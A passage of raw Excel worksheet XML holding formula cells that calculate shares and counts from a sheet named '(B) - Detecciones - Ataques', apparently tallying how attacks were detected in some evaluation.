        <f>IF('(B) - Detecciones - Ataques'!HQ55&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ55*'(B) - Detecciones - Ataques'!HO55/('(B) - Detecciones - Ataques'!HN55+'(B) - Detecciones - Ataques'!HO55),0)</f>
        <v>0</v>
      </c>
      <c r="EM63" s="571"/>
    </row>
    <row r="64">
      <c r="O64" s="700"/>
      <c r="P64" s="690"/>
      <c r="Q64" s="690"/>
      <c r="R64" s="690"/>
      <c r="S64" s="690"/>
      <c r="T64" s="690"/>
      <c r="U64" s="690"/>
      <c r="V64" s="690"/>
      <c r="W64" s="690"/>
      <c r="X64" s="690"/>
      <c r="Y64" s="690"/>
      <c r="Z64" s="690"/>
      <c r="AA64" s="690"/>
      <c r="AB64" s="614"/>
      <c r="EJ64" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ56&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ56*'(B) - Detecciones - Ataques'!HN56/('(B) - Detecciones - Ataques'!HN56+'(B) - Detecciones - Ataques'!HO56),0)</f>
        <v>0</v>
      </c>
      <c r="EK64" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ56&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ56*'(B) - Detecciones - Ataques'!HO56/('(B) - Detecciones - Ataques'!HN56+'(B) - Detecciones - Ataques'!HO56),0)</f>
        <v>0.8888888889</v>
      </c>
      <c r="EM64" s="571"/>
    </row>
    <row r="65">
      <c r="O65" s="698"/>
      <c r="P65" s="336"/>
      <c r="Q65" s="336"/>
      <c r="R65" s="336"/>
      <c r="S65" s="336"/>
      <c r="T65" s="336"/>
      <c r="U65" s="336"/>
      <c r="V65" s="336"/>
      <c r="W65" s="336"/>
      <c r="X65" s="336"/>
      <c r="Y65" s="336"/>
      <c r="Z65" s="336"/>
      <c r="AA65" s="336"/>
      <c r="AB65" s="336"/>
      <c r="EJ65" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ57&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ57*'(B) - Detecciones - Ataques'!HN57/('(B) - Detecciones - Ataques'!HN57+'(B) - Detecciones - Ataques'!HO57),0)</f>
        <v>0</v>
      </c>
      <c r="EK65" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ57&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ57*'(B) - Detecciones - Ataques'!HO57/('(B) - Detecciones - Ataques'!HN57+'(B) - Detecciones - Ataques'!HO57),0)</f>
        <v>1</v>
      </c>
      <c r="EM65" s="571"/>
    </row>
    <row r="66">
      <c r="EJ66" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ58&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ58*'(B) - Detecciones - Ataques'!HN58/('(B) - Detecciones - Ataques'!HN58+'(B) - Detecciones - Ataques'!HO58),0)</f>
        <v>0</v>
      </c>
      <c r="EK66" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ58&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ58*'(B) - Detecciones - Ataques'!HO58/('(B) - Detecciones - Ataques'!HN58+'(B) - Detecciones - Ataques'!HO58),0)</f>
        <v>0</v>
      </c>
      <c r="EM66" s="571"/>
    </row>
    <row r="67">
      <c r="EJ67" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ59&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ59*'(B) - Detecciones - Ataques'!HN59/('(B) - Detecciones - Ataques'!HN59+'(B) - Detecciones - Ataques'!HO59),0)</f>
        <v>1</v>
      </c>
      <c r="EK67" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ59&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ59*'(B) - Detecciones - Ataques'!HO59/('(B) - Detecciones - Ataques'!HN59+'(B) - Detecciones - Ataques'!HO59),0)</f>
        <v>0</v>
      </c>
      <c r="EM67" s="571"/>
    </row>
    <row r="68">
      <c r="EJ68" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ60&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ60*'(B) - Detecciones - Ataques'!HN60/('(B) - Detecciones - Ataques'!HN60+'(B) - Detecciones - Ataques'!HO60),0)</f>
        <v>0</v>
      </c>
      <c r="EK68" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ60&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ60*'(B) - Detecciones - Ataques'!HO60/('(B) - Detecciones - Ataques'!HN60+'(B) - Detecciones - Ataques'!HO60),0)</f>
        <v>0</v>
      </c>
      <c r="EM68" s="571"/>
    </row>
    <row r="69">
      <c r="EJ69" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ61&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ61*'(B) - Detecciones - Ataques'!HN61/('(B) - Detecciones - Ataques'!HN61+'(B) - Detecciones - Ataques'!HO61),0)</f>
        <v>0</v>
      </c>
      <c r="EK69" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ61&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ61*'(B) - Detecciones - Ataques'!HO61/('(B) - Detecciones - Ataques'!HN61+'(B) - Detecciones - Ataques'!HO61),0)</f>
        <v>0</v>
      </c>
      <c r="EM69" s="571"/>
    </row>
    <row r="70">
      <c r="EJ70" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ62&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ62*'(B) - Detecciones - Ataques'!HN62/('(B) - Detecciones - Ataques'!HN62+'(B) - Detecciones - Ataques'!HO62),0)</f>
        <v>0</v>
      </c>
      <c r="EK70" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ62&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ62*'(B) - Detecciones - Ataques'!HO62/('(B) - Detecciones - Ataques'!HN62+'(B) - Detecciones - Ataques'!HO62),0)</f>
        <v>1</v>
      </c>
      <c r="EM70" s="571"/>
    </row>
    <row r="71">
      <c r="EJ71" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ63&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ63*'(B) - Detecciones - Ataques'!HN63/('(B) - Detecciones - Ataques'!HN63+'(B) - Detecciones - Ataques'!HO63),0)</f>
        <v>1</v>
      </c>
      <c r="EK71" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ63&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ63*'(B) - Detecciones - Ataques'!HO63/('(B) - Detecciones - Ataques'!HN63+'(B) - Detecciones - Ataques'!HO63),0)</f>
        <v>0</v>
      </c>
      <c r="EM71" s="571"/>
    </row>
    <row r="72">
      <c r="EJ72" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ64&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ64*'(B) - Detecciones - Ataques'!HN64/('(B) - Detecciones - Ataques'!HN64+'(B) - Detecciones - Ataques'!HO64),0)</f>
        <v>1</v>
      </c>
      <c r="EK72" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ64&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ64*'(B) - Detecciones - Ataques'!HO64/('(B) - Detecciones - Ataques'!HN64+'(B) - Detecciones - Ataques'!HO64),0)</f>
        <v>0</v>
      </c>
      <c r="EM72" s="571"/>
    </row>
    <row r="73">
      <c r="EJ73" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ65&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ65*'(B) - Detecciones - Ataques'!HN65/('(B) - Detecciones - Ataques'!HN65+'(B) - Detecciones - Ataques'!HO65),0)</f>
        <v>0</v>
      </c>
      <c r="EK73" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ65&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ65*'(B) - Detecciones - Ataques'!HO65/('(B) - Detecciones - Ataques'!HN65+'(B) - Detecciones - Ataques'!HO65),0)</f>
        <v>0</v>
      </c>
      <c r="EM73" s="571"/>
    </row>
    <row r="74">
      <c r="EJ74" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ66&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ66*'(B) - Detecciones - Ataques'!HN66/('(B) - Detecciones - Ataques'!HN66+'(B) - Detecciones - Ataques'!HO66),0)</f>
        <v>0</v>
      </c>
      <c r="EK74" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ66&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ66*'(B) - Detecciones - Ataques'!HO66/('(B) - Detecciones - Ataques'!HN66+'(B) - Detecciones - Ataques'!HO66),0)</f>
        <v>0</v>
      </c>
      <c r="EM74" s="571"/>
    </row>
    <row r="75">
      <c r="EJ75" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ67&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ67*'(B) - Detecciones - Ataques'!HN67/('(B) - Detecciones - Ataques'!HN67+'(B) - Detecciones - Ataques'!HO67),0)</f>
        <v>0</v>
      </c>
      <c r="EK75" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ67&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ67*'(B) - Detecciones - Ataques'!HO67/('(B) - Detecciones - Ataques'!HN67+'(B) - Detecciones - Ataques'!HO67),0)</f>
        <v>0</v>
      </c>
      <c r="EM75" s="571"/>
    </row>
    <row r="76">
      <c r="EJ76" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ68&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ68*'(B) - Detecciones - Ataques'!HN68/('(B) - Detecciones - Ataques'!HN68+'(B) - Detecciones - Ataques'!HO68),0)</f>
        <v>0</v>
      </c>
      <c r="EK76" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ68&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ68*'(B) - Detecciones - Ataques'!HO68/('(B) - Detecciones - Ataques'!HN68+'(B) - Detecciones - Ataques'!HO68),0)</f>
        <v>1</v>
      </c>
      <c r="EM76" s="571"/>
    </row>
    <row r="77">
      <c r="EJ77" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ69&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ69*'(B) - Detecciones - Ataques'!HN69/('(B) - Detecciones - Ataques'!HN69+'(B) - Detecciones - Ataques'!HO69),0)</f>
        <v>0</v>
      </c>
      <c r="EK77" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ69&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ69*'(B) - Detecciones - Ataques'!HO69/('(B) - Detecciones - Ataques'!HN69+'(B) - Detecciones - Ataques'!HO69),0)</f>
        <v>1</v>
      </c>
      <c r="EM77" s="571"/>
    </row>
    <row r="78">
      <c r="EJ78" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ70&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ70*'(B) - Detecciones - Ataques'!HN70/('(B) - Detecciones - Ataques'!HN70+'(B) - Detecciones - Ataques'!HO70),0)</f>
        <v>0</v>
      </c>
      <c r="EK78" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ70&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ70*'(B) - Detecciones - Ataques'!HO70/('(B) - Detecciones - Ataques'!HN70+'(B) - Detecciones - Ataques'!HO70),0)</f>
        <v>0</v>
      </c>
      <c r="EM78" s="571"/>
    </row>
    <row r="79">
      <c r="EJ79" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ71&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ71*'(B) - Detecciones - Ataques'!HN71/('(B) - Detecciones - Ataques'!HN71+'(B) - Detecciones - Ataques'!HO71),0)</f>
        <v>0</v>
      </c>
      <c r="EK79" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ71&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ71*'(B) - Detecciones - Ataques'!HO71/('(B) - Detecciones - Ataques'!HN71+'(B) - Detecciones - Ataques'!HO71),0)</f>
        <v>0</v>
      </c>
      <c r="EM79" s="571"/>
    </row>
    <row r="80">
      <c r="EJ80" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ72&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ72*'(B) - Detecciones - Ataques'!HN72/('(B) - Detecciones - Ataques'!HN72+'(B) - Detecciones - Ataques'!HO72),0)</f>
        <v>0</v>
      </c>
      <c r="EK80" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ72&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ72*'(B) - Detecciones - Ataques'!HO72/('(B) - Detecciones - Ataques'!HN72+'(B) - Detecciones - Ataques'!HO72),0)</f>
        <v>0</v>
      </c>
      <c r="EM80" s="571"/>
    </row>
    <row r="81">
      <c r="EJ81" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ73&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ73*'(B) - Detecciones - Ataques'!HN73/('(B) - Detecciones - Ataques'!HN73+'(B) - Detecciones - Ataques'!HO73),0)</f>
        <v>0</v>
      </c>
      <c r="EK81" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ73&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ73*'(B) - Detecciones - Ataques'!HO73/('(B) - Detecciones - Ataques'!HN73+'(B) - Detecciones - Ataques'!HO73),0)</f>
        <v>0</v>
      </c>
      <c r="EM81" s="571"/>
    </row>
    <row r="82">
      <c r="EJ82" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ74&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ74*'(B) - Detecciones - Ataques'!HN74/('(B) - Detecciones - Ataques'!HN74+'(B) - Detecciones - Ataques'!HO74),0)</f>
        <v>0</v>
      </c>
      <c r="EK82" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ74&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ74*'(B) - Detecciones - Ataques'!HO74/('(B) - Detecciones - Ataques'!HN74+'(B) - Detecciones - Ataques'!HO74),0)</f>
        <v>0</v>
      </c>
      <c r="EM82" s="571"/>
    </row>
    <row r="83">
      <c r="EJ83" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ75&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ75*'(B) - Detecciones - Ataques'!HN75/('(B) - Detecciones - Ataques'!HN75+'(B) - Detecciones - Ataques'!HO75),0)</f>
        <v>0</v>
      </c>
      <c r="EK83" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ75&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ75*'(B) - Detecciones - Ataques'!HO75/('(B) - Detecciones - Ataques'!HN75+'(B) - Detecciones - Ataques'!HO75),0)</f>
        <v>0</v>
      </c>
      <c r="EM83" s="571"/>
    </row>
    <row r="84">
      <c r="EC84" s="21" t="s">
        <v>2690</v>
      </c>
      <c r="ED84" s="36">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!HQ3:HQ139,100%)</f>
        <v>46</v>
      </c>
      <c r="EJ84" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ76&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ76*'(B) - Detecciones - Ataques'!HN76/('(B) - Detecciones - Ataques'!HN76+'(B) - Detecciones - Ataques'!HO76),0)</f>
        <v>0</v>
      </c>
      <c r="EK84" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ76&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ76*'(B) - Detecciones - Ataques'!HO76/('(B) - Detecciones - Ataques'!HN76+'(B) - Detecciones - Ataques'!HO76),0)</f>
        <v>0</v>
      </c>
      <c r="EM84" s="571"/>
    </row>
    <row r="85">
      <c r="EC85" s="21" t="s">
        <v>2691</v>
      </c>
      <c r="ED85" s="36">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!HQ3:HQ139,"&lt;&gt;100%")</f>
        <v>42</v>
      </c>
      <c r="EJ85" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ77&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ77*'(B) - Detecciones - Ataques'!HN77/('(B) - Detecciones - Ataques'!HN77+'(B) - Detecciones - Ataques'!HO77),0)</f>
        <v>0</v>
      </c>
      <c r="EK85" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ77&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ77*'(B) - Detecciones - Ataques'!HO77/('(B) - Detecciones - Ataques'!HN77+'(B) - Detecciones - Ataques'!HO77),0)</f>
        <v>0</v>
      </c>
      <c r="EM85" s="571"/>
    </row>
    <row r="86">
      <c r="EJ86" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ78&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ78*'(B) - Detecciones - Ataques'!HN78/('(B) - Detecciones - Ataques'!HN78+'(B) - Detecciones - Ataques'!HO78),0)</f>
        <v>1</v>
      </c>
      <c r="EK86" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ78&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ78*'(B) - Detecciones - Ataques'!HO78/('(B) - Detecciones - Ataques'!HN78+'(B) - Detecciones - Ataques'!HO78),0)</f>
        <v>0</v>
      </c>
      <c r="EM86" s="571"/>
    </row>
    <row r="87">
      <c r="EJ87" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ79&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ79*'(B) - Detecciones - Ataques'!HN79/('(B) - Detecciones - Ataques'!HN79+'(B) - Detecciones - Ataques'!HO79),0)</f>
        <v>0</v>
      </c>
      <c r="EK87" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ79&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ79*'(B) - Detecciones - Ataques'!HO79/('(B) - Detecciones - Ataques'!HN79+'(B) - Detecciones - Ataques'!HO79),0)</f>
        <v>0</v>
      </c>
      <c r="EM87" s="571"/>
    </row>
    <row r="88">
      <c r="EJ88" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ80&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ80*'(B) - Detecciones - Ataques'!HN80/('(B) - Detecciones - Ataques'!HN80+'(B) - Detecciones - Ataques'!HO80),0)</f>
        <v>1</v>
      </c>
      <c r="EK88" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ80&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ80*'(B) - Detecciones - Ataques'!HO80/('(B) - Detecciones - Ataques'!HN80+'(B) - Detecciones - Ataques'!HO80),0)</f>
        <v>0</v>
      </c>
      <c r="EM88" s="571"/>
    </row>
    <row r="89">
      <c r="EC89" s="20" t="s">
        <v>2692</v>
      </c>
      <c r="ED89" s="36">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!HQ3:HQ139,"&lt;&gt;100%",'(B) - Detecciones - Ataques'!HN3:HN139,0,'(B) - Detecciones - Ataques'!HO3:HO139,0)</f>
        <v>34</v>
      </c>
      <c r="EJ89" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ81&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ81*'(B) - Detecciones - Ataques'!HN81/('(B) - Detecciones - Ataques'!HN81+'(B) - Detecciones - Ataques'!HO81),0)</f>
        <v>1</v>
      </c>
      <c r="EK89" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ81&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ81*'(B) - Detecciones - Ataques'!HO81/('(B) - Detecciones - Ataques'!HN81+'(B) - Detecciones - Ataques'!HO81),0)</f>
        <v>0</v>
      </c>
      <c r="EM89" s="571"/>
    </row>
    <row r="90">
      <c r="EC90" s="20" t="s">
        <v>2693</v>
      </c>
      <c r="ED90" s="36">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!HQ3:HQ139,"&lt;&gt;100%",'(B) - Detecciones - Ataques'!HN3:HN139,0,'(B) - Detecciones - Ataques'!HO3:HO139,"&lt;&gt;0")</f>
        <v>2</v>
      </c>
      <c r="EJ90" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ82&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ82*'(B) - Detecciones - Ataques'!HN82/('(B) - Detecciones - Ataques'!HN82+'(B) - Detecciones - Ataques'!HO82),0)</f>
        <v>0</v>
      </c>
      <c r="EK90" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ82&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ82*'(B) - Detecciones - Ataques'!HO82/('(B) - Detecciones - Ataques'!HN82+'(B) - Detecciones - Ataques'!HO82),0)</f>
        <v>0</v>
      </c>
      <c r="EM90" s="571"/>
    </row>
    <row r="91">
      <c r="EC91" s="20" t="s">
        <v>2694</v>
      </c>
      <c r="ED91" s="36">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!HQ3:HQ139,"&lt;&gt;100%",'(B) - Detecciones - Ataques'!HN3:HN139,"&lt;&gt;0")</f>
        <v>6</v>
      </c>
      <c r="EJ91" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ83&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ83*'(B) - Detecciones - Ataques'!HN83/('(B) - Detecciones - Ataques'!HN83+'(B) - Detecciones - Ataques'!HO83),0)</f>
        <v>0</v>
      </c>
      <c r="EK91" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ83&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ83*'(B) - Detecciones - Ataques'!HO83/('(B) - Detecciones - Ataques'!HN83+'(B) - Detecciones - Ataques'!HO83),0)</f>
        <v>0</v>
      </c>
      <c r="EM91" s="571"/>
    </row>
    <row r="92">
      <c r="EJ92" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ84&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ84*'(B) - Detecciones - Ataques'!HN84/('(B) - Detecciones - Ataques'!HN84+'(B) - Detecciones - Ataques'!HO84),0)</f>
        <v>0</v>
      </c>
      <c r="EK92" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ84&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ84*'(B) - Detecciones - Ataques'!HO84/('(B) - Detecciones - Ataques'!HN84+'(B) - Detecciones - Ataques'!HO84),0)</f>
        <v>0</v>
      </c>
      <c r="EM92" s="571"/>
    </row>
    <row r="93">
      <c r="EJ93" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ85&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ85*'(B) - Detecciones - Ataques'!HN85/('(B) - Detecciones - Ataques'!HN85+'(B) - Detecciones - Ataques'!HO85),0)</f>
        <v>1</v>
      </c>
      <c r="EK93" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ85&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ85*'(B) - Detecciones - Ataques'!HO85/('(B) - Detecciones - Ataques'!HN85+'(B) - Detecciones - Ataques'!HO85),0)</f>
        <v>0</v>
      </c>
      <c r="EM93" s="571"/>
    </row>
    <row r="94">
      <c r="EJ94" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ86&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ86*'(B) - Detecciones - Ataques'!HN86/('(B) - Detecciones - Ataques'!HN86+'(B) - Detecciones - Ataques'!HO86),0)</f>
        <v>0</v>
      </c>
      <c r="EK94" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ86&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ86*'(B) - Detecciones - Ataques'!HO86/('(B) - Detecciones - Ataques'!HN86+'(B) - Detecciones - Ataques'!HO86),0)</f>
        <v>0</v>
      </c>
      <c r="EM94" s="571"/>
    </row>
    <row r="95">
      <c r="EJ95" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ87&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ87*'(B) - Detecciones - Ataques'!HN87/('(B) - Detecciones - Ataques'!HN87+'(B) - Detecciones - Ataques'!HO87),0)</f>
        <v>0</v>
      </c>
      <c r="EK95" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ87&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ87*'(B) - Detecciones - Ataques'!HO87/('(B) - Detecciones - Ataques'!HN87+'(B) - Detecciones - Ataques'!HO87),0)</f>
        <v>0</v>
      </c>
      <c r="EM95" s="571"/>
    </row>
    <row r="96">
      <c r="EJ96" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ88&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ88*'(B) - Detecciones - Ataques'!HN88/('(B) - Detecciones - Ataques'!HN88+'(B) - Detecciones - Ataques'!HO88),0)</f>
        <v>1</v>
      </c>
      <c r="EK96" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ88&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ88*'(B) - Detecciones - Ataques'!HO88/('(B) - Detecciones - Ataques'!HN88+'(B) - Detecciones - Ataques'!HO88),0)</f>
        <v>0</v>
      </c>
      <c r="EM96" s="571"/>
    </row>
    <row r="97">
      <c r="EJ97" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ89&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ89*'(B) - Detecciones - Ataques'!HN89/('(B) - Detecciones - Ataques'!HN89+'(B) - Detecciones - Ataques'!HO89),0)</f>
        <v>0</v>
      </c>
      <c r="EK97" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ89&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ89*'(B) - Detecciones - Ataques'!HO89/('(B) - Detecciones - Ataques'!HN89+'(B) - Detecciones - Ataques'!HO89),0)</f>
        <v>0</v>
      </c>
      <c r="EM97" s="571"/>
    </row>
    <row r="98">
      <c r="EJ98" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ90&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ90*'(B) - Detecciones - Ataques'!HN90/('(B) - Detecciones - Ataques'!HN90+'(B) - Detecciones - Ataques'!HO90),0)</f>
        <v>0</v>
      </c>
      <c r="EK98" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ90&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ90*'(B) - Detecciones - Ataques'!HO90/('(B) - Detecciones - Ataques'!HN90+'(B) - Detecciones - Ataques'!HO90),0)</f>
        <v>0</v>
      </c>
      <c r="EM98" s="571"/>
    </row>
    <row r="99">
      <c r="EJ99" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ91&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ91*'(B) - Detecciones - Ataques'!HN91/('(B) - Detecciones - Ataques'!HN91+'(B) - Detecciones - Ataques'!HO91),0)</f>
        <v>0</v>
      </c>
      <c r="EK99" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ91&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ91*'(B) - Detecciones - Ataques'!HO91/('(B) - Detecciones - Ataques'!HN91+'(B) - Detecciones - Ataques'!HO91),0)</f>
        <v>0</v>
      </c>
      <c r="EM99" s="571"/>
    </row>
    <row r="100">
      <c r="EJ100" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ92&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ92*'(B) - Detecciones - Ataques'!HN92/('(B) - Detecciones - Ataques'!HN92+'(B) - Detecciones - Ataques'!HO92),0)</f>
        <v>1</v>
      </c>
      <c r="EK100" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ92&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ92*'(B) - Detecciones - Ataques'!HO92/('(B) - Detecciones - Ataques'!HN92+'(B) - Detecciones - Ataques'!HO92),0)</f>
        <v>0</v>
      </c>
      <c r="EM100" s="571"/>
    </row>
    <row r="101">
      <c r="EJ101" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ93&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ93*'(B) - Detecciones - Ataques'!HN93/('(B) - Detecciones - Ataques'!HN93+'(B) - Detecciones - Ataques'!HO93),0)</f>
        <v>0</v>
      </c>
      <c r="EK101" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ93&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ93*'(B) - Detecciones - Ataques'!HO93/('(B) - Detecciones - Ataques'!HN93+'(B) - Detecciones - Ataques'!HO93),0)</f>
        <v>0</v>
      </c>
      <c r="EM101" s="571"/>
    </row>
    <row r="102">
      <c r="EJ102" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ94&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ94*'(B) - Detecciones - Ataques'!HN94/('(B) - Detecciones - Ataques'!HN94+'(B) - Detecciones - Ataques'!HO94),0)</f>
        <v>0</v>
      </c>
      <c r="EK102" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ94&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ94*'(B) - Detecciones - Ataques'!HO94/('(B) - Detecciones - Ataques'!HN94+'(B) - Detecciones - Ataques'!HO94),0)</f>
        <v>0</v>
      </c>
      <c r="EM102" s="571"/>
    </row>
    <row r="103">
      <c r="EJ103" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ95&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ95*'(B) - Detecciones - Ataques'!HN95/('(B) - Detecciones - Ataques'!HN95+'(B) - Detecciones - Ataques'!HO95),0)</f>
        <v>1</v>
      </c>
      <c r="EK103" s="626">
